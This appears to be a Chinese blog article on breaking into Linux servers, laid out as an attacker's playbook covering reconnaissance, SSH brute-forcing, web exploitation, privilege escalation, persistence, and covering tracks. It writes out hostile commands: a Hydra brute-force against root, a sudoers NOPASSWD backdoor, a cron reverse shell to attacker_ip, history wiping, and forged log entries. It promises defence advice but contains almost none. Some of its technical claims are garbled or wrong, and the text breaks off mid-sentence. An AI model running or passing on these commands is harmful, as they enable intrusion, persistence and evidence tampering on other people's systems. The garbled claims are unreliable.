渗入linux服务器
- 云服务器
- 2025-08-26
- 6
Linux服务器需通过信息收集、漏洞利用、提权及横向移动等步骤实现,常用技术包括脏牛漏洞(CVE-2016-5195)、隧道搭建和反弹shell
渗入Linux服务器的系统性方法与防御建议
信息收集阶段
| 技术手段 | 工具示例 | 作用说明 |
|---|---|---|
| Nmap扫描 | nmap -sS -A <目标IP> | 识别开放端口和服务指纹 |
| Whois查询 | whois <域名/IP> | 获取注册信息及关联组织线索 |
| Shodan检索 | Web界面或API调用 | 发现同类设备的历史漏洞曝光记录 |
| 子域名枚举 | Amass、Sublist3r | 扩展攻破面至二级站点 |
| CMS识别 | WhatWeb、Wappalyzer | 判断Web框架类型(如WordPress) |
️ 关键点:此阶段需避免触发WAF/IDS告警,建议使用慢速扫描模式(如--timing-template slow)。
漏洞挖掘与利用
常见弱口令攻破路径
# 使用Hydra暴力免费SSH登录(示例) hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target_ip
- 替代方案:John the Ripper离线免费哈希值(需先获取/etc/shadow文件)
Web层面载入漏洞
| 漏洞类型 | EXP示例 | 绕过技巧 |
|---|---|---|
| SQLi | sqlmap –dbms=mysql -u “…id='” | Tamper脚本编码请求参数 |
| RCE | Metasploit辅助模块生成Payload | 结合WAF绕过编码(Base64/Unicode) |
| SSTI | Python沙盒逃逸 | 构造恶意模板文件上传 |
内核提权漏洞(CVE优先级排序)
CVE-202X-XXXX → ExploitDB查找对应PoC → GDB动态调试验证崩溃点
注意:现代系统开启KASLR后需泄漏地址才能稳定利用,可配合ROP链构建可靠Shellcode。
权限维持与横向移动
| 持久化技术 | 实现命令 | 检测难点 |
|---|---|---|
| SUDOssu配置改动 | echo ‘hacker ALL=(ALL) NOPASSWD:ALL’ >> /etc/sudoers | VirusTotal查杀率低 |
| Rootkit植入 | kernel模块隐藏.so文件 | lsmod查看异常模块名 |
| CronJob后们 | crontab -e >> m h /bin/bash -i > /dev/tcp/attacker_ip/4444 | |
| 计划任务反向连接 | ps auxf难以发现休眠进程 |
进阶技巧:
- Token Impersonation: sudo -u#-1 /bin/bash获取前一个用户的会话令牌
- SUID程序滥用: 查找具有CAP_SETUID能力的二进制文件(find / -perm /4000 2>/dev/null)
痕迹清除与日志杜撰
# 清理历史记录(危险操作!) history -c; cat /dev/null > ~/.bash_history # 修改系统日志索引时间戳 logger "System rebooted due to kernel panic" --timestamp="2023-01-01T00:00:00"
警告:审计严格的环境会记录logrotate操作,建议优先覆盖而非删除原始日志条目。
典型攻破场景还原表
| 场景编号 | 初始入口 | 关键跳板 | 最终目标 |
|---|---|---|---|
| SCENARIO_01 | 弱密码RDP服务 | MSSQL提权至System | Dump域内所有Hash |
| SCENARIO_02 | 公开GitHub代码库 | Confluence未授权访问 | 获取AWS元数据服务凭证 |
| SCENARIO_03 | DNS投毒截持 | 恶意JS生产脚本执行 | 内网Proxychains隧道建立 |
相关问题与解答
Q1: 如果目标启用了SELinux如何突破强制访问控制?
A: 可通过两种方式绕过:①寻找未被标签化的合法进程载入代码(如curl);②利用Object Manager漏洞修改策略规则(需内核EXP支持),推荐优先尝试setsebool -P allow_execstack on禁用堆栈不可执行保护。
Q2: 遇到ASLR+Canary防护的二进制程序怎样稳定利用?
A: 组合使用以下技术栈:①Leak Library地址通过格式化字符串漏洞;②BROP无依赖Shellcode生成;③Spray大量相同对象降低熵值,Metasploit框架中的pattern_create工具可


